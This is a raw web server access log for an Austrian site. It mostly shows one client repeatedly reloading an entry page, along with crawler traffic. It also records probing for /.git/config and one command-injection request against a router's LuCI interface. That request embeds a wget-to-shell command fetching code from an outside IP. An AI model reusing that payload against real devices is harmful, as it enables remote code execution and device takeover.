178.115.45.138 - - [08/Aug/2024:12:01:55 +0200] "GET /entry.php?id=10271&&ser=111254 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111194" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:01:55 +0200] "GET /gui/javascript/form_form.js?1723111315 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111254" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:02:55 +0200] "GET /entry.php?id=10271&&ser=111315 HTTP/1.1" 200 985 "http://hausegger.activities.at/entry.php?id=10271&&ser=111254" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:02:55 +0200] "GET /gui/javascript/form_form.js?1723111375 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111315" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
17.241.75.186 - - [08/Aug/2024:12:03:20 +0200] "GET /ucp.php?i=pm&folder=inbox&sid=54df32ee0ee0f7bf8a54e23511949d55 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
178.115.45.138 - - [08/Aug/2024:12:03:55 +0200] "GET /entry.php?id=10271&&ser=111375 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111315" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:03:56 +0200] "GET /gui/javascript/form_form.js?1723111435 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111375" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [08/Aug/2024:12:04:19 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005151003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [08/Aug/2024:12:04:51 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116129.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:04:56 +0200] "GET /entry.php?id=10271&&ser=111435 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111375" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:04:56 +0200] "GET /gui/javascript/form_form.js?1723111496 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111435" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.89.247.57 - - [08/Aug/2024:12:05:20 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
52.167.144.138 - - [08/Aug/2024:12:05:54 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 297 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
178.115.45.138 - - [08/Aug/2024:12:05:56 +0200] "GET /entry.php?id=10271&&ser=111496 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=111435" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:05:56 +0200] "GET /gui/javascript/form_form.js?1723111556 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111496" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.89.247.57 - - [08/Aug/2024:12:05:57 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.4(0x17000428) NetType/WIFI Language/zh_CN"
185.224.128.83 - - [08/Aug/2024:12:06:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.20.232%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.115.45.138 - - [08/Aug/2024:12:06:56 +0200] "GET /entry.php?id=10271&&ser=111556 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111496" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:06:56 +0200] "GET /gui/javascript/form_form.js?1723111616 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111556" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [08/Aug/2024:12:07:20 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961403.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:07:57 +0200] "GET /entry.php?id=10271&&ser=111616 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111556" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:07:57 +0200] "GET /gui/javascript/form_form.js?1723111677 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111616" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:08:57 +0200] "GET /entry.php?id=10271&&ser=111677 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=111616" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:08:57 +0200] "GET /gui/javascript/form_form.js?1723111737 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111677" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:09:57 +0200] "GET /entry.php?id=10271&&ser=111737 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=111677" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:09:57 +0200] "GET /gui/javascript/form_form.js?1723111797 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111737" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:10:58 +0200] "GET /entry.php?id=10271&&ser=111797 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111737" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:10:58 +0200] "GET /gui/javascript/form_form.js?1723111858 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111797" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [08/Aug/2024:12:11:08 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908021603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:11:58 +0200] "GET /entry.php?id=10271&&ser=111858 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111797" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:11:58 +0200] "GET /gui/javascript/form_form.js?1723111918 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111858" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:12:58 +0200] "GET /entry.php?id=10271&&ser=111918 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=111858" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:12:58 +0200] "GET /gui/javascript/form_form.js?1723111978 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111918" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:13:58 +0200] "GET /entry.php?id=10271&&ser=111978 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111918" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:13:59 +0200] "GET /gui/javascript/form_form.js?1723112039 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=111978" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [08/Aug/2024:12:14:32 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108111103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:14:59 +0200] "GET /entry.php?id=10271&&ser=112039 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=111978" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:14:59 +0200] "GET /gui/javascript/form_form.js?1723112099 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112039" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [08/Aug/2024:12:15:50 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005051303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:15:59 +0200] "GET /entry.php?id=10271&&ser=112099 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=112039" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:15:59 +0200] "GET /gui/javascript/form_form.js?1723112159 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112099" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
149.50.103.48 - - [08/Aug/2024:12:16:24 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
178.115.45.138 - - [08/Aug/2024:12:16:59 +0200] "GET /entry.php?id=10271&&ser=112159 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112099" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:17:00 +0200] "GET /gui/javascript/form_form.js?1723112219 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112159" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:18:00 +0200] "GET /entry.php?id=10271&&ser=112219 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112159" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:18:00 +0200] "GET /gui/javascript/form_form.js?1723112280 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112219" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:19:00 +0200] "GET /entry.php?id=10271&&ser=112280 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112219" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:19:00 +0200] "GET /gui/javascript/form_form.js?1723112340 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112280" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:20:00 +0200] "GET /entry.php?id=10271&&ser=112340 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112280" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:20:00 +0200] "GET /gui/javascript/form_form.js?1723112400 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112340" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:21:01 +0200] "GET /entry.php?id=10271&&ser=112400 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=112340" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:21:01 +0200] "GET /gui/javascript/form_form.js?1723112461 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112400" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:22:01 +0200] "GET /entry.php?id=10271&&ser=112461 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=112400" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:22:01 +0200] "GET /gui/javascript/form_form.js?1723112521 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112461" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:23:01 +0200] "GET /entry.php?id=10271&&ser=112521 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=112461" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:23:01 +0200] "GET /gui/javascript/form_form.js?1723112581 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112521" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.174.93.12 - - [08/Aug/2024:12:23:25 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
178.115.45.138 - - [08/Aug/2024:12:24:02 +0200] "GET /entry.php?id=10271&&ser=112581 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112521" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:24:02 +0200] "GET /gui/javascript/form_form.js?1723112642 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112581" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:25:02 +0200] "GET /entry.php?id=10271&&ser=112642 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112581" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:25:02 +0200] "GET /gui/javascript/form_form.js?1723112702 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112642" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:26:02 +0200] "GET /entry.php?id=10271&&ser=112702 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112642" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:26:02 +0200] "GET /gui/javascript/form_form.js?1723112762 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112702" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:27:02 +0200] "GET /entry.php?id=10271&&ser=112762 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=112702" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:27:03 +0200] "GET /gui/javascript/form_form.js?1723112823 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112762" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:28:03 +0200] "GET /entry.php?id=10271&&ser=112822 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112762" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:28:03 +0200] "GET /gui/javascript/form_form.js?1723112883 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112822" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:29:03 +0200] "GET /entry.php?id=10271&&ser=112883 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112822" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:29:03 +0200] "GET /gui/javascript/form_form.js?1723112943 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112883" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:30:03 +0200] "GET /entry.php?id=10271&&ser=112943 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=112883" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:30:03 +0200] "GET /gui/javascript/form_form.js?1723113003 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=112943" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:31:04 +0200] "GET /entry.php?id=10271&&ser=113003 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=112943" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:31:04 +0200] "GET /gui/javascript/form_form.js?1723113064 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113003" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:32:04 +0200] "GET /entry.php?id=10271&&ser=113064 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113003" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:32:04 +0200] "GET /gui/javascript/form_form.js?1723113124 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113064" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:33:04 +0200] "GET /entry.php?id=10271&&ser=113124 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113064" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:33:04 +0200] "GET /gui/javascript/form_form.js?1723113184 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113124" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:34:05 +0200] "GET /entry.php?id=10271&&ser=113184 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113124" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:34:05 +0200] "GET /gui/javascript/form_form.js?1723113245 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113184" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:35:05 +0200] "GET /entry.php?id=10271&&ser=113245 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113184" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:35:05 +0200] "GET /gui/javascript/form_form.js?1723113305 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113245" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:36:05 +0200] "GET /entry.php?id=10271&&ser=113305 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113245" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:36:05 +0200] "GET /gui/javascript/form_form.js?1723113365 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113305" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [08/Aug/2024:12:37:03 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3114891.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:37:05 +0200] "GET /entry.php?id=10271&&ser=113365 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113305" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:37:06 +0200] "GET /gui/javascript/form_form.js?1723113426 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113365" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:38:06 +0200] "GET /entry.php?id=10271&&ser=113426 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113365" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:38:06 +0200] "GET /gui/javascript/form_form.js?1723113486 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113426" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:39:06 +0200] "GET /entry.php?id=10271&&ser=113486 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113426" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:39:06 +0200] "GET /gui/javascript/form_form.js?1723113546 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113486" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [08/Aug/2024:12:40:01 +0200] "GET /renault.activities.at/htdocs/log/cron/pickupLogisticData_3116481.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:40:06 +0200] "GET /entry.php?id=10271&&ser=113546 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113486" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:40:07 +0200] "GET /gui/javascript/form_form.js?1723113606 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113546" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [08/Aug/2024:12:40:39 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116398.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.45.138 - - [08/Aug/2024:12:41:07 +0200] "GET /entry.php?id=10271&&ser=113606 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=113546" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:41:07 +0200] "GET /gui/javascript/form_form.js?1723113667 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=113606" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.115.45.138 - - [08/Aug/2024:12:42:07 +0200] "GET /entry.php?id=10271&&ser=113667 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=113606" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
